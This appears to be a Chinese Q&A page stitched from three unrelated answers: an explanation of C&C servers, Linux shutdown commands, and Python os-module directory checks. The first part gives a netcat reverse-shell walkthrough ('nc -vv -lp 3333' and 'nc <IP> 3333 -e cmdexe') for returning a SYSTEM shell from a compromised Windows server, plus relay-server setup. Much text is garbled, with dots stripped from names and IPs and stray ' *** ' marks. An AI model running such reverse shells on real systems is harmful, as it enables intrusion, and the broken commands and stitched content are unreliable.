什么是C&C服务器

C&C 服务器的全称是 Command and Control Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个 webshell 的时候，需要对服务器进行提权 *** 作，如果是一台 windows 的服务器，提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权，有些 exp 可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd，这时就需要将低权限的 cmd shell 反d回本地，这里用 nc 在本地执行：nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接，假设电脑 IP 是公网的，并且 IP 为 114114114114，然后在目标服务器就可以执行：nc 114114114114 3333 -e cmdexe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地，这时你就可以通过 nc 建立的这个 shell 进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的 C&C 服务器。

扩展资料：

C&C 服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网 IP 地址是：111111111111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

⑴shutdown
[-t] 指定在多长时间之后关闭系统
[-r] 重启系统
[-k] 并不真正关机，只是给每个登录用户发送警告信号
[-h] 关闭系统（halt）
⑵halt
halt是最简单的关机命令，其实际上是调用shutdown -h命令。halt执行时，杀死应用进程，文件系统写 *** 作完成后就会停止内核。
halt命令的部分参数如下：
[-f] 没有调用shutdown而强制关机或重启
[-i] 关机或重新启动之前，关掉所有的网络接口
[-p] 关机时调用poweroff，此选项为缺省选项
⑶reboot
reboot工作过程与halt类似，作用是重新启动，而halt是关机。其参数与halt类似。
⑷init
init是所有进程的祖先，其进程号始终为1。init用于切换系统的运行级别，切换的工作是立即完成的。init 0命令用于立即将系统运行级别切换为0，即关机；init 6命令用于将系统运行级别切换为6，即重新启动。
如果有什么不懂的话可以去看看《Linux就该这么学》这本书，非常适合新手学习Linux。

1、下载Windows x86-64 MSI installerexe安装包进行安装后使用python命令打开python命令行界面。

2、在命令行中导入os库，有了os库就可以使用python指令 *** 作 *** 作系统相关 *** 作导入命令：>>>import os。

3、使用python的os指令创建目录，创建目录d:/hello/python，>>>osmakedirs('d:/hello/python') ，显示目录，>>>oslistdir('d:/hello')。

4、使用 ospathexists判断文件夹是否存在>>>ospathexists('d:/hello/python')返回True  ，表示d:/hello/python文件夹存在>>>ospathexists('d:/hello/python2')返回False  ，表示d:/hello/python2文件夹不存在。

5、使用ospathisdir判断是否为文件夹，如果返回True则表示文件夹存在>>>ospathisdir('d:/hello/python')返回True  ，表示d:/hello/python文件夹存在>>>ospathisdir('d:/hello/python2')返回False  ，表示d:/hello/python2文件夹不存在。

---